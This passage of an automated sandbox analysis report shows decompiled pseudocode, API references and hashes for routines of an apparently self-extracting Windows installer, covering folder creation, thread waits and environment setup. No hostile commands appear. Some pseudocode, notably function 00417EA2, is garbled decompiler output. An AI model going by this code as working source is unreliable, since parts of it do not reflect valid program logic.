0x00405565
0x0040556c
0x0040556d
0x00405572
0x00405579
0x0040557a
0x00405586
0x0040558b
0x00405591
0x00405597
0x00405599
0x0040559b
0x004055a3
0x004055a9
0x004055ab
0x004055b7
0x004055bd
0x004055cb
0x004055d0
0x004055d2
0x004055d2
0x004055d8
0x004055da
0x004055e7
0x004055e7
0x004055ec
0x004055ef
0x004055d2
0x004055f4
0x004055f5
0x004055fe

APIs

LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 00405513
#17.COMCTL32(?,?,00000000), ref: 0040551E

Part of subcall function 00403D6D: GetUserDefaultUILanguage.KERNEL32(0040552E,?,?,00000000), ref: 00403D77

Part of subcall function 00403DC8: GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
Part of subcall function 00403DC8: wsprintfW.USER32 ref: 00403E28
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E42
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT ref: 00403E5D
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E77
Part of subcall function 00403DC8: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT ref: 00403E9C
Part of subcall function 00403DC8: SetLastError.KERNEL32(?), ref: 00403EC3
Part of subcall function 00403DC8: lstrlenA.KERNEL32(0041B930), ref: 00403EF9
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT ref: 00403F14
Part of subcall function 00403DC8: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46

Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT ref: 00403EBA
Part of subcall function 00403DC8: _wtol.MSVCRT(?), ref: 00403F57
Part of subcall function 00403DC8: MultiByteToWideChar.KERNEL32(00000000,0041B930,00000001,00000000,00000002), ref: 00403F77

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004055A3
wsprintfW.USER32 ref: 004055B7

Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050B8
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050C1
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050C9

Strings

SfxFolder%02d, xrefs: 004055B1
kernel32, xrefs: 0040550E

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$ErrorLast$??2@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: SfxFolder%02d$kernel32
API String ID: 2610933736-229743753
Opcode ID: 467f208b881723f1b48256c29b593af1913bc66351c71722998cd8edbf16a6d1
Instruction ID: fb37d50bbeb3418e991456411a156af5b0a8a8317b04918dd84ef7d62563be16
Opcode Fuzzy Hash: 467f208b881723f1b48256c29b593af1913bc66351c71722998cd8edbf16a6d1
Instruction Fuzzy Hash: 02219076950304AAE720AF77BC4AECA7BA8EF44705F10853FF415A61D0DA384984CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040284E, Relevance: 6.1, APIs: 4, Instructions: 99
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0040284E(void* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t12;
				void* _t13;
				long _t16;
				int _t18;
				intOrPtr _t23;
				void* _t29;
				void* _t34;

				_t29 = __edx;
				_push(__ecx);
				_t34 = __ecx;
				E0040242A(__ecx, _a4);
				 *0x41e724 = _t34;
				 *0x41e728 = 0; // executed
				_t12 = CreateThread(0, 0, E00402734, _t34, 0,  &_v8); // executed
				 *0x41e720 = _t12;
				if(_t12 != 0) {
					if( *0x41e770 != 2) {
						E00408D16(_t29);
						_t12 =  *0x41e720; // 0x33c
					}
					WaitForSingleObject(_t12, 0xffffffff);
					_t12 =  *0x41e720; // 0x33c
				}
				_t23 =  *0x41e728; // 0x0
				 *0x41e8c4 = 0;
				if(_t23 == 0) {
					_a4 = 0;
					__eflags =  *0x41e8cc; // 0x0
					if(__eflags != 0) {
						goto L27;
					} else {
						__eflags = _t12;
						if(_t12 == 0) {
							L20:
							__eflags = (_a4 & 0x80070000) - 0x80070000;
							if((_a4 & 0x80070000) == 0x80070000) {
								_t16 = _a4 & 0x0000ffff;
								__eflags = _t16 - 0xe;
								if(_t16 != 0xe) {
									L25:
									SetLastError(_t16);
									_push(_a4);
									_push(0x22);
									_push(1);
									goto L26;
								} else {
									__eflags =  *0x41e774 - 0xffffffff;
									if( *0x41e774 != 0xffffffff) {
										goto L25;
									}
								}
							} else {
								_push(_a4);
								_push(0x21);
								goto L22;
							}
							goto L27;
						} else {
							_t18 = GetExitCodeThread(_t12,  &_a4); // executed
							__eflags = _t18;
							if(_t18 == 0) {
								goto L20;
							} else {
								__eflags = _a4;
								if(_a4 != 0) {
									goto L20;
								} else {
									_t13 = 0;
								}
							}
						}
					}
				} else {
					if(_t23 == 1) {
						_push(0x11);
						goto L14;
					} else {
						if(_t23 == 2) {
							_push(0x13);
							goto L14;
						} else {
							if(_t23 == 3) {
								_push(0x12);
								L14:
								_push(0);
								E0040976C(_t29);
							} else {
								if(_t23 <= 0x67 || _t23 > 0x6b) {
									_push(_t23);
									_push(0x14);
									L22:
									_push(0);
									L26:
									E0040976C(_t29);
								}
							}
						}
					}
					L27:
					_t13 = 0x80004005;
				}
				return _t13;
			}

0x0040284e
0x00402851
0x00402857
0x00402859
0x0040286d
0x00402873
0x00402879
0x0040287f
0x00402886
0x0040288f
0x00402891
0x00402896
0x00402896
0x0040289e
0x004028a4
0x004028a4
0x004028a9
0x004028af
0x004028b7
0x004028ef
0x004028f2
0x004028f8
0x00000000
0x004028fa
0x004028fa
0x004028fc
0x00402916
0x00402920
0x00402922
0x0040292f
0x00402934
0x00402937
0x00402942
0x00402943
0x00402949
0x0040294c
0x0040294e
0x00000000
0x00402939
0x00402939
0x00402940
0x00000000
0x00000000
0x00402940
0x00402924
0x00402924
0x00402927
0x00000000
0x00402927
0x00000000
0x004028fe
0x00402903
0x00402909
0x0040290b
0x00000000
0x0040290d
0x0040290d
0x00402910
0x00000000
0x00402912
0x00402912
0x00402912
0x00402910
0x0040290b
0x004028fc
0x004028b9
0x004028bc
0x004028e3
0x00000000
0x004028be
0x004028c1
0x004028df
0x00000000
0x004028c3
0x004028c6
0x004028db
0x004028e5
0x004028e5
0x004028e6
0x004028c8
0x004028cb
0x004028d6
0x004028d7
0x00402929
0x00402929
0x00402950
0x00402950
0x00402955
0x004028cb
0x004028c6
0x004028c1
0x00402958
0x00402958
0x00402958
0x00402960

APIs

CreateThread.KERNELBASE ref: 00402879
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 0040289E
GetExitCodeThread.KERNELBASE(00000000,0041AA3C,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 00402903
SetLastError.KERNEL32(0041AA3C,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 00402943

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 2732711357-0
Opcode ID: 84fee42053e057f3378805e89464497ff8e350c1136537873458d8e55eef0d4b
Instruction ID: 8b2ec0040d8b5e9cc765cc96d666c658be7f578e6807eca23fde730058974b68
Opcode Fuzzy Hash: 84fee42053e057f3378805e89464497ff8e350c1136537873458d8e55eef0d4b
Instruction Fuzzy Hash: 8C31277A300201BADF356B11DE4DABB3B58FB85350F24823BF911B62D0D6B88881D71E

Uniqueness

Uniqueness Score: -1.00%

Function 00411604, Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00411604(void** __ecx, void* _a4) {
				void* _v0;
				void* _v20;
				void* _t14;
				void* _t16;
				void* _t19;
				void* _t21;
				void* _t22;
				void** _t23;
				void* _t26;
				void* _t27;
				void** _t28;
				void** _t29;

				_t23 = __ecx;
				_t26 = _a4;
				_t28 = __ecx;
				if(_t26 < __ecx[1] || _t26 >= 0x40000000) {
					_push(0x41c9d4);
					_push( &_a4);
					_a4 = 0x13329ac;
					L00419360();
					asm("int3");
					_t21 = _v20;
					_push(_t28);
					_push(_t26);
					_t29 = _t23;
					if(_t21 >= 0x40000000) {
						_push(0x41c9d4);
						_push( &_v0);
						_v0 = 0x13329ac;
						L00419360();
					}
					_t11 = _t21 + 1; // 0x13329ad
					_t14 = _t11;
					_push(_t14);
					L004191BC();
					_t27 = _t14;
					 *_t27 = 0;
					_push( *_t29);
					L004191B0();
					 *_t29 = _t27;
					_t29[2] = _t21;
					return _t14;
				} else {
					_t16 = _t26 + 1;
					_push(_t16); // executed
					L004191BC(); // executed
					_t22 = _t16;
					_t19 = memcpy(_t22,  *__ecx, __ecx[1] + 1);
					_push( *_t28);
					L004191B0();
					_t28[2] = _t26;
					 *_t28 = _t22;
					return _t19;
				}
			}

0x00411604
0x0041160a
0x0041160d
0x00411612
0x0041164a
0x00411652
0x00411653
0x0041165a
0x0041165f
0x00411664
0x00411667
0x00411668
0x00411669
0x00411671
0x00411673
0x0041167b
0x0041167c
0x00411683
0x00411683
0x00411688
0x00411688
0x0041168b
0x0041168c
0x00411691
0x00411693
0x00411696
0x00411698
0x0041169f
0x004116a2
0x004116a8
0x0041161c
0x0041161c
0x0041161f
0x00411620
0x00411625
0x0041162f
0x00411634
0x00411636
0x0041163e
0x00411642
0x00411647
0x00411647

APIs

??2@YAPAXI@Z.MSVCRT ref: 00411620
memcpy.MSVCRT ref: 0041162F
??3@YAXPAX@Z.MSVCRT ref: 00411636
_CxxThrowException.MSVCRT(00BC25D8,0041C9D4), ref: 0041165A

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: dd94d9c96c14de751855915266a7300183ae03a81de4dd6506bd0ce4764e4e1c
Instruction ID: acb851cd5d6ec94b4642c442a788d7ea64d5cf8d2888cb5aee67fa9e3068b209
Opcode Fuzzy Hash: dd94d9c96c14de751855915266a7300183ae03a81de4dd6506bd0ce4764e4e1c
Instruction Fuzzy Hash: D4F0B4B2100209BFD720AF5ACC81DDAF7EEFF54358714442FF99A83511D235A8C08BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040317A, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0040317A(WCHAR* __ecx) {
				int _t2;
				long _t5;
				signed char _t6;
				WCHAR* _t9;

				_t9 = __ecx;
				_t2 = CreateDirectoryW(__ecx, 0); // executed
				if(_t2 != 0) {
					L7:
					return 1;
				}
				_t5 = GetLastError();
				if(_t5 == 0xb7) {
					_t6 = GetFileAttributesW(_t9); // executed
					if(_t6 == 0xffffffff || (_t6 & 0x00000010) != 0) {
						goto L7;
					} else {
						_push(0xb7);
						L3:
						SetLastError();
						return 0;
					}
				}
				_push(_t5);
				goto L3;
			}

0x0040317c
0x00403181
0x00403189
0x004031b8
0x00000000
0x004031ba
0x0040318b
0x00403198
0x004031a6
0x004031af
0x00000000
0x004031b5
0x004031b5
0x0040319b
0x0040319b
0x00000000
0x004031a1
0x004031af
0x0040319a
0x00000000

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,-00000001,004047E5,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract), ref: 00403181
GetLastError.KERNEL32(?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040318B
SetLastError.KERNEL32(000000B7,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040319B
GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004031A6

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 8433fba26e05a83753d4dc70028e505715306c94392b2ab9b50cde710c697177
Instruction ID: a90d619ace12dcc58cec56a8214a7704fd14c1b401374c1c4e5215055585a3f3
Opcode Fuzzy Hash: 8433fba26e05a83753d4dc70028e505715306c94392b2ab9b50cde710c697177
Instruction Fuzzy Hash: DDE092301451107AE6101F34AC0C6BB3A5C9B9EB23F184576F402E82D0D73C4906012A

Uniqueness

Uniqueness Score: -1.00%

Function 0040235E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E0040235E(intOrPtr __ecx, intOrPtr __edx, signed short* _a4, intOrPtr* _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v40;
				signed int _t34;
				signed short* _t55;
				intOrPtr* _t58;

				_v8 = _v8 & 0x00000000;
				_v12 = __ecx;
				_v16 = __edx;
				E00411B84( &_v28, __ecx);
				_t55 = _a4;
				E004015EC( &_v28,  *_t55 & 0x0000ffff);
				_t58 = _a8;
				L1:
				while(E00405041() == 0) {
					_t55 =  &(_t55[1]);
					_t34 =  *_t55 & 0x0000ffff;
					if(_t34 >= 0x30 && _t34 <= 0x39) {
						L8:
						E00411BE5( &_v28, _v12);
						E004015EC( &_v28,  *_t55 & 0x0000ffff);
						_v8 = _v8 & 0x00000000;
						continue;
					}
					if(_t34 >= 0x61 && _t34 <= 0x7a) {
						goto L8;
					}
					if(_t34 >= 0x41 && _t34 <= 0x5a) {
						goto L8;
					}
					_push(_v28);
					L004191B0();
					return 1;
				}
				E00411B84( &_v40, _t30);
				E0040206F( &_v40, _v16, 0, _t58, _a12); // executed
				_push(_v40);
				L004191B0();
				 *(_t58 + 4) =  *(_t58 + 4) & 0x00000000;
				 *((short*)( *_t58)) = 0;
				_v8 = _v8 + 1;
				_a12 = 0x41aa3c;
				goto L1;
			}

0x00402364
0x0040236a
0x00402371
0x00402374
0x00402379
0x00402383
0x00402388
0x00000000
0x0040238b
0x0040239a
0x0040239d
0x004023a3
0x004023be
0x004023c4
0x004023d0
0x004023d5
0x00000000
0x004023d5
0x004023ad
0x00000000
0x00000000
0x004023b7
0x00000000
0x00000000
0x00402418
0x0040241b
0x00402427
0x00402427
0x004023df
0x004023f0
0x004023f5
0x004023f8
0x004023fd
0x00402406
0x00402409
0x0040240c
0x00000000

APIs

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

??3@YAXPAX@Z.MSVCRT ref: 004023F8
??3@YAXPAX@Z.MSVCRT ref: 0040241B

Strings

PreExtract, xrefs: 00402369

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$memcpy
String ID: PreExtract
API String ID: 750647942-1883995278
Opcode ID: e695908261d8e44da6e4391d7ef5d12bbb7850b021f519d7d2ccae3465a307d2
Instruction ID: 45d7e0e5023832e0b8c8538628168a0a11dddb05f7aa8aa784a61664bfc27f9f
Opcode Fuzzy Hash: e695908261d8e44da6e4391d7ef5d12bbb7850b021f519d7d2ccae3465a307d2
Instruction Fuzzy Hash: F8218671804106EBDF14EF91C986AEEB775EF11314F20442BE902B61E1E77C9E85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E96, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00405E96() {
				WCHAR* _v16;
				int _t9;
				intOrPtr _t10;
				intOrPtr _t15;
				signed int _t20;
				void* _t21;
				void* _t22;

				_t20 = 0;
				_t21 =  *0x41e78c - _t20; // 0x9f
				if(_t21 > 0) {
					do {
						_t10 =  *0x41e788; // 0x45f5fa0
						E00411BBA( &_v16,  *((intOrPtr*)(_t10 + _t20 * 4)) + 0xc);
						E0040562E( &_v16, _t21);
						_t15 =  *0x41e788; // 0x45f5fa0
						_t9 = SetEnvironmentVariableW( *( *(_t15 + _t20 * 4)), _v16); // executed
						_push(_v16);
						L004191B0();
						_t20 = _t20 + 1;
						_t22 = _t20 -  *0x41e78c; // 0x9f
					} while (_t22 < 0);
				}
				return _t9;
			}

0x00405e9d
0x00405e9f
0x00405ea5
0x00405ea7
0x00405ea7
0x00405eb6
0x00405ebe
0x00405ec3
0x00405ed0
0x00405ed6
0x00405ed9
0x00405ede
0x00405ee0
0x00405ee0
0x00405ea7
0x00405eea

APIs

Part of subcall function 00411BBA: memcpy.MSVCRT ref: 00411BD6

SetEnvironmentVariableW.KERNELBASE(00BCB458,00000000,00BCB44C,SetEnvironment,00000000,?,00000000), ref: 00405ED0
??3@YAXPAX@Z.MSVCRT ref: 00405ED9

Strings

SetEnvironment, xrefs: 00405E9C

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@EnvironmentVariablememcpy
String ID: SetEnvironment
API String ID: 357128876-360490078
Opcode ID: 48f5db1aa3807254ce0d3c3ba3599f528be59d7b2ec74138965f66581f357966
Instruction ID: 5015d73053f31e41eb786119d6f7a2c70dc77ac034249f383db117d4599dd948
Opcode Fuzzy Hash: 48f5db1aa3807254ce0d3c3ba3599f528be59d7b2ec74138965f66581f357966
Instruction Fuzzy Hash: 6FF01236900114AFDB11EF95FC41CCEB775EB143047408179E961A71B2DB35A955CF8D

Uniqueness

Uniqueness Score: -1.00%

Function 00403FB2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403FB2() {
				signed short _v40;
				_Unknown_base(*)()* _t3;

				_t3 = GetProcAddress( *0x41e75c, "GetNativeSystemInfo");
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3( &_v40); // executed
					return _v40 & 0x0000ffff;
				}
			}

0x00403fc3
0x00403fcb
0x00403fdc
0x00403fcd
0x00403fd1
0x00403fd8
0x00403fd8

APIs

GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403FC3
GetNativeSystemInfo.KERNELBASE(?,?,?,00403FE2,004061EA,00000001,00000001,00000000,?,00000000), ref: 00403FD1

Strings

GetNativeSystemInfo, xrefs: 00403FB8

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: AddressInfoNativeProcSystem
String ID: GetNativeSystemInfo
API String ID: 2220751540-3949249589
Opcode ID: deffbf9ad2f06d67f5a7a96eac976a7a49d3226baf58badd71ca99372c048d5e
Instruction ID: 809e6a6de965d18d48b39f8f4e00aed40c1c5cd8ab5549a1552232fcd34172b3
Opcode Fuzzy Hash: deffbf9ad2f06d67f5a7a96eac976a7a49d3226baf58badd71ca99372c048d5e
Instruction Fuzzy Hash: 0ED0A72070020566CB059FB1AD059DB77F89A086487100170E803F00D0EA79DD90D365

Uniqueness

Uniqueness Score: -1.00%

Function 00417EA2, Relevance: 4.7, APIs: 3, Instructions: 220
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417EA2(void* __ecx, intOrPtr* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v32;
				intOrPtr* _t106;
				void* _t148;
				char _t151;
				intOrPtr _t152;
				intOrPtr* _t179;
				void* _t181;

				_t179 = _a4;
				E0041563D(_t179);
				 *((intOrPtr*)(_t179 + 0xe8)) =  *((intOrPtr*)(__ecx + 0x40));
				_t106 =  *((intOrPtr*)(__ecx + 0x44));
				 *((intOrPtr*)(_t179 + 0xec)) = _t106;
				_t151 =  *((intOrPtr*)(__ecx + 0x56));
				_t181 = __ecx - 1;
				_push(_t181);
				 *((char*)(_t179 + 0xe0)) = _t151;
				_t152 =  *((intOrPtr*)(_t181 + 0x57));
				_t148 = 0;
				asm("fisttp dword [eax+0xe18f]");
				 *_t106 =  *_t106 + _t106;
				 *_t106 =  *_t106;
				asm("lahf");
				asm("loopne 0x2");
				 *_t106 =  *_t106 + _t106;
				 *_t179 =  *_t179 + _t152;
				 *_t106 =  *_t106 + _t106;
				 *0x4E8B6046 =  *((intOrPtr*)(0x4e8b6046)) + _t152;
			}

0x00417eab
0x00417eb2
0x00417eba
0x00417ec0
0x00417ec3
0x00417ec9
0x00417eca
0x00417ecb
0x00417ecc
0x00417ed2
0x00417ed5
0x00417ed6
0x00417eda
0x00417edc
0x00417ede
0x00417edf
0x00417ee1
0x00417ee2
0x00417ee6
0x00417ee8

APIs

Part of subcall function 0041563D: ??3@YAXPAX@Z.MSVCRT ref: 0041566D
Part of subcall function 0041563D: ??3@YAXPAX@Z.MSVCRT ref: 0041567E

??2@YAPAXI@Z.MSVCRT ref: 0041800B
??3@YAXPAX@Z.MSVCRT ref: 00418029
??3@YAXPAX@Z.MSVCRT ref: 00418170

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: f8703f3d122f71815251a6abf06f0f80e629cb5b5908d3e18b388de9ac9825ff
Instruction ID: cc61e8b391bfb9a68098a7a85693b93431bc851093f7dc7a68c56b28134787d6
Opcode Fuzzy Hash: f8703f3d122f71815251a6abf06f0f80e629cb5b5908d3e18b388de9ac9825ff
Instruction Fuzzy Hash: 75917E30A0464AEFCF14DFA5C480AEEFBB1BF08304F10852EE45593351DB79AA95CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004163FE, Relevance: 4.6, APIs: 3, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004163FE(void* __ecx, void* __eflags, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				void* __esi;
				signed int _t44;
				void* _t46;
				intOrPtr* _t48;
				signed int _t49;
				void* _t50;
				signed int _t53;
				signed int _t54;
				void* _t56;
				intOrPtr* _t58;
				void* _t60;
				signed int _t64;
				signed int _t66;
				signed int _t69;
				signed int _t73;
				signed int _t81;
				signed int _t84;
				void* _t85;
				void* _t88;
				void* _t98;
				signed int _t101;
				void* _t103;
				signed int _t105;
				void* _t106;
				void* _t107;

				_t60 = __ecx;
				_t98 = __ecx + 0x50;
				_t44 = E00413818(0x20); // executed
				if(_t44 == 0) {
					if(E0041610D(_t98) == 0) {
						_t46 = _a8;
						__eflags = _t46;
						if(_t46 == 0) {
							L7:
							_push(0x8000); // executed
							L004191BC(); // executed
							_v24 = _v24 & 0x00000000;
							_t7 =  &_v20;
							 *_t7 = _v20 & 0x00000000;
							__eflags =  *_t7;
							_t88 = _t46;
							_v12 = _t88;
							_t64 = 8;
							memcpy(_t88, _t98, _t64 << 2);
							_t107 = _t106 + 0xc;
							while(1) {
								_t66 = _a8;
								_t81 = 0x7fe0;
								__eflags = _t66;
								if(_t66 == 0) {
									goto L13;
								}
								_t53 =  *_t66 - _v24;
								asm("sbb ecx, [ebp-0x10]");
								__eflags =  *(_t66 + 4);
								if(__eflags > 0) {
									goto L13;
								} else {
									if(__eflags < 0) {
										L12:
										_t81 = _t53;
										__eflags = _t53;
										if(_t53 == 0) {
											L30:
											_t101 = 1;
											__eflags = 1;
										} else {
											goto L13;
										}
									} else {
										__eflags = _t53 - 0x7fe0;
										if(_t53 >= 0x7fe0) {
											goto L13;
										} else {
											goto L12;
										}
									}
								}
								L31:
								_push(_v12);
								L004191B0();
								_t44 = _t101;
								goto L3;
								L13:
								_t48 = _a4;
								_v8 = _v8 & 0x00000000;
								_t49 =  *((intOrPtr*)( *_t48 + 0xc))(_t48, _v12 + 0x20, _t81,  &_v8);
								__eflags = _t49;
								if(_t49 != 0) {
									L33:
									_t101 = _t49;
								} else {
									_t69 = _v8;
									__eflags = _t69;
									if(_t69 == 0) {
										goto L30;
									} else {
										_t84 = 0;
										__eflags = 0;
										while(1) {
											_t50 = _v12;
											_t103 = _t50 + _t84 + 1;
											_t85 = _t50 + _t69;
											__eflags = _t103 - _t85;
											if(_t103 > _t85) {
												break;
											} else {
												goto L17;
											}
											while(1) {
												L17:
												__eflags =  *_t103 - 0x37;
												if( *_t103 == 0x37) {
													break;
												}
												__eflags =  *(_t103 + 1) - 0x37;
												if( *(_t103 + 1) == 0x37) {
													_t103 = _t103 + 1;
												} else {
													__eflags =  *(_t103 + 2) - 0x37;
													if( *(_t103 + 2) == 0x37) {
														_t103 = _t103 + 2;
													} else {
														__eflags =  *(_t103 + 3) - 0x37;
														if( *(_t103 + 3) == 0x37) {
															_t103 = _t103 + 3;
															__eflags = _t103;
														} else {
															_t103 = _t103 + 4;
															__eflags = _t103 - _t85;
															if(_t103 <= _t85) {
																continue;
															} else {
															}
														}
													}
												}
												break;
											}
											__eflags = _t103 - _t85;
											if(_t103 > _t85) {
												break;
											} else {
												_v16 = _t103 - _t50;
												_t54 = E0041610D(_t103);
												__eflags = _t54;
												if(_t54 != 0) {
													_t73 = 8;
													_t56 = memcpy(_t60 + 0x50, _t103, _t73 << 2);
													asm("adc ecx, [ebp-0x10]");
													 *((intOrPtr*)(_t60 + 0x40)) =  *((intOrPtr*)(_t60 + 0x40)) + _t56 + _v24;
													_t58 = _a4;
													asm("adc [ebx+0x44], ecx");
													_t105 =  *((intOrPtr*)(_t60 + 0x40)) + 0x20;
													__eflags = _t105;
													asm("adc edi, ecx");
													_t49 =  *((intOrPtr*)( *_t58 + 0x10))(_t58, _t105,  *((intOrPtr*)(_t60 + 0x44)), 0, 0);
